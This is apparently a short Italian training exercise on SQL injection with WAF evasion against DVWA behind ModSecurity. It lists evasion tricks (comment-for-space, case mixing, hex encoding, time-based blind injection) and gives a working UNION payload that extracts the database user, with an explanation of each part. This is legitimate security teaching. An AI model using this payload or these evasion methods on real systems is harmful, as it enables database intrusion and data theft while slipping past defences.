Obiettivo: Eseguire una SQL Injection avanzata bypassando un Web Application Firewall (WAF).
Ambiente:
DVWA (Damn Vulnerable Web App) con ModSecurity attivo.
Tecniche utilizzate:
Commenti SQL (
/**/)Case manipulation (
SeLeCt)Hex encoding (
0x...)Time-based blind SQLi
Payload avanzato:
'/**/UNION/**/SeLeCt/**/1,concat(0x3a,user(),0x3a),3/**/FROM/**/users%23
Spiegazione:
/**/sostituisce gli spazi per evitare rilevamento.0x3aè il carattere:in esadecimale.%23è l’URL encoding di#(commento in MySQL).
Vedi anche il video allegato
Allegati
Rubrica